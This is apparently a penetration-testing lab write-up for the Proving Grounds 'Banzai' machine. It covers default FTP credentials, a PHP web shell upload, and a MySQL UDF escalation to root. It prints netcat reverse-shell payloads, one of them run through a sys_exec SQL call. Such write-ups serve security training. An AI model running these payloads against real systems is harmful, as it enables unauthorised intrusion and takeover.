Banzai

Writeup for Pelican from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.141.56 all

Service Enumeration

HTTP (Port 8295)

Doesn't look's like there's anything useful here.

SMTP (Port 25)

SMTP user enumeration.

We got the users in SMTP, however, they all need a password to be authenticated.

FTP (Port 21)

We try admin:admin and we are authenticated!

The files here look very similar to our gobuster result on the web app on port 8295, maybe we can add a PHP web shell and access it from port 8295.

Exploit

GitHub - artyuum/Simple-PHP-Web-Shell: Tiny PHP Web shell for executing unix commands from web pageGitHub

Let's upload our web shell onto the FTP server.

Let's navigate to our web shell and we have RCE!

Let's get our interactive shell.

Payload: nc -e /bin/sh 192.168.49.141 22

Privesc

Looks like there is mysql running as root and credentials to it.

3306 - Pentesting MysqlHackTricks

We can follow this trick to gain root.

Look's like the lib_mysqludf_sys.so is missing from our target machine. So let's download it to our attack machine and transfer it to our target machine.

metasploit-framework/data/exploits/mysql at master · rapid7/metasploit-frameworkGitHub

Let's check if our target machine is 32 or 64 bit.

Once we transfer the files, we can try getting a reverse shell.

Payload:

select sys_exec('nc -e /bin/sh 192.168.49.141 22');

PreviousChatty NextTry harder

Last updated 2 years ago